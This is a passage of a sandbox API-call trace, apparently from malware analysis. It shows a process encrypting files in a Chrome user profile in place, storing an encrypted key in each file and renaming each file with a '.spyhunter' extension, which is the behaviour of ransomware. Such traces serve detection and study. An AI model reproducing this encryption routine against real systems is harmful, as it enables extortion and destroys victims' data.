pbBuffer=0x25cec90 | out: pbBuffer=0x25cec90) returned 1 [0156.495] GetProcessHeap () returned 0x2c0000 [0156.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.495] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec88*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec88*=0x30) returned 1 [0156.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.496] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG") returned 140 [0156.496] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0156.496] GetProcessHeap () returned 0x2c0000 [0156.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.496] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cec4c*=0xc3, lpOverlapped=0x0) returned 1 [0156.496] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.497] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x25cec4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cec4c*=0xc3, lpOverlapped=0x0) returned 1 [0156.497] GetProcessHeap () returned 0x2c0000 [0156.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.497] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.497] WriteFile (in: hFile=0x9c, lpBuffer=0x25cec8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec4c, lpOverlapped=0x0 | out: lpBuffer=0x25cec8c*, lpNumberOfBytesWritten=0x25cec4c*=0x4, lpOverlapped=0x0) returned 1 [0156.497] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec4c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec4c*=0x30, lpOverlapped=0x0) returned 1 [0156.497] CloseHandle (hObject=0x9c) returned 1 [0156.497] GetProcessHeap () returned 0x2c0000 [0156.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.497] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.spyhunter") returned 150 [0156.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.spyhunter")) returned 1 [0156.498] GetProcessHeap () returned 0x2c0000 [0156.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.498] GetProcessHeap () returned 0x2c0000 [0156.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.498] GetProcessHeap () returned 0x2c0000 [0156.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff4448 | out: hHeap=0x2c0000) returned 1 [0156.498] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec90 | out: pbBuffer=0x25cec90) returned 1 [0156.498] GetProcessHeap () returned 0x2c0000 [0156.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.498] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec88*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec88*=0x30) returned 1 [0156.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.499] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK") returned 141 [0156.499] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0156.499] GetProcessHeap () returned 0x2c0000 [0156.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.499] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cec4c*=0x0, lpOverlapped=0x0) returned 1 [0156.499] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.499] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cec4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cec4c*=0x0, lpOverlapped=0x0) returned 1 [0156.500] GetProcessHeap () returned 0x2c0000 [0156.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.500] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.500] WriteFile (in: hFile=0x9c, lpBuffer=0x25cec8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec4c, lpOverlapped=0x0 | out: lpBuffer=0x25cec8c*, lpNumberOfBytesWritten=0x25cec4c*=0x4, lpOverlapped=0x0) returned 1 [0156.500] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec4c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec4c*=0x30, lpOverlapped=0x0) returned 1 [0156.501] CloseHandle (hObject=0x9c) returned 1 [0156.501] GetProcessHeap () returned 0x2c0000 [0156.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.501] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK.spyhunter") returned 151 [0156.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock.spyhunter")) returned 1 [0156.502] GetProcessHeap () returned 0x2c0000 [0156.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.502] GetProcessHeap () returned 0x2c0000 [0156.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.502] GetProcessHeap () returned 0x2c0000 [0156.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff42e0 | out: hHeap=0x2c0000) returned 1 [0156.502] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec88 | out: pbBuffer=0x25cec88) returned 1 [0156.502] GetProcessHeap () returned 0x2c0000 [0156.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.502] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec80*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec80*=0x30) returned 1 [0156.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.503] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT") returned 144 [0156.503] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0156.503] GetProcessHeap () returned 0x2c0000 [0156.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.503] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cec44*=0x10, lpOverlapped=0x0) returned 1 [0156.503] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.503] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x25cec44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cec44*=0x10, lpOverlapped=0x0) returned 1 [0156.504] GetProcessHeap () returned 0x2c0000 [0156.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.504] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.504] WriteFile (in: hFile=0x9c, lpBuffer=0x25cec84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec44, lpOverlapped=0x0 | out: lpBuffer=0x25cec84*, lpNumberOfBytesWritten=0x25cec44*=0x4, lpOverlapped=0x0) returned 1 [0156.504] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec44, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec44*=0x30, lpOverlapped=0x0) returned 1 [0156.504] CloseHandle (hObject=0x9c) returned 1 [0156.504] GetProcessHeap () returned 0x2c0000 [0156.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.504] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT.spyhunter") returned 154 [0156.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current.spyhunter")) returned 1 [0156.505] GetProcessHeap () returned 0x2c0000 [0156.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.505] GetProcessHeap () returned 0x2c0000 [0156.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.505] GetProcessHeap () returned 0x2c0000 [0156.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26138 | out: hHeap=0x2c0000) returned 1 [0156.505] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec88 | out: pbBuffer=0x25cec88) returned 1 [0156.505] GetProcessHeap () returned 0x2c0000 [0156.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.505] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec80*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec80*=0x30) returned 1 [0156.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log") returned 147 [0156.506] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0156.506] GetProcessHeap () returned 0x2c0000 [0156.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.506] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cec44*=0x0, lpOverlapped=0x0) returned 1 [0156.506] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.506] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cec44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cec44*=0x0, lpOverlapped=0x0) returned 1 [0156.506] GetProcessHeap () returned 0x2c0000 [0156.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.506] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.506] WriteFile (in: hFile=0x9c, lpBuffer=0x25cec84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec44, lpOverlapped=0x0 | out: lpBuffer=0x25cec84*, lpNumberOfBytesWritten=0x25cec44*=0x4, lpOverlapped=0x0) returned 1 [0156.507] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec44, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec44*=0x30, lpOverlapped=0x0) returned 1 [0156.507] CloseHandle (hObject=0x9c) returned 1 [0156.508] GetProcessHeap () returned 0x2c0000 [0156.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.508] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.spyhunter") returned 157 [0156.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.spyhunter")) returned 1 [0156.508] GetProcessHeap () returned 0x2c0000 [0156.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.508] GetProcessHeap () returned 0x2c0000 [0156.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.508] GetProcessHeap () returned 0x2c0000 [0156.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f25fc8 | out: hHeap=0x2c0000) returned 1 [0156.509] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec80 | out: pbBuffer=0x25cec80) returned 1 [0156.509] GetProcessHeap () returned 0x2c0000 [0156.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.509] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec78*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec78*=0x30) returned 1 [0156.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal") returned 97 [0156.509] StrStrW (lpFirst="Shortcuts-journal", lpSrch=".txt") returned 0x0 [0156.509] GetProcessHeap () returned 0x2c0000 [0156.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.509] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cec3c*=0x0, lpOverlapped=0x0) returned 1 [0156.509] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.510] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cec3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cec3c*=0x0, lpOverlapped=0x0) returned 1 [0156.510] GetProcessHeap () returned 0x2c0000 [0156.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.510] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.510] WriteFile (in: hFile=0x9c, lpBuffer=0x25cec7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec3c, lpOverlapped=0x0 | out: lpBuffer=0x25cec7c*, lpNumberOfBytesWritten=0x25cec3c*=0x4, lpOverlapped=0x0) returned 1 [0156.510] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec3c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec3c*=0x30, lpOverlapped=0x0) returned 1 [0156.511] CloseHandle (hObject=0x9c) returned 1 [0156.511] GetProcessHeap () returned 0x2c0000 [0156.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.511] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal.spyhunter") returned 107 [0156.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts-journal.spyhunter")) returned 1 [0156.511] GetProcessHeap () returned 0x2c0000 [0156.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.512] GetProcessHeap () returned 0x2c0000 [0156.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.512] GetProcessHeap () returned 0x2c0000 [0156.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a3a8 | out: hHeap=0x2c0000) returned 1 [0156.512] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec80 | out: pbBuffer=0x25cec80) returned 1 [0156.512] GetProcessHeap () returned 0x2c0000 [0156.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.512] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec78*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec78*=0x30) returned 1 [0156.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts") returned 89 [0156.513] StrStrW (lpFirst="Shortcuts", lpSrch=".txt") returned 0x0 [0156.513] GetProcessHeap () returned 0x2c0000 [0156.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.513] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cec3c*=0x2800, lpOverlapped=0x0) returned 1 [0156.524] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.525] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cec3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cec3c*=0x2800, lpOverlapped=0x0) returned 1 [0156.525] GetProcessHeap () returned 0x2c0000 [0156.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.525] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.525] WriteFile (in: hFile=0x9c, lpBuffer=0x25cec7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec3c, lpOverlapped=0x0 | out: lpBuffer=0x25cec7c*, lpNumberOfBytesWritten=0x25cec3c*=0x4, lpOverlapped=0x0) returned 1 [0156.525] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, 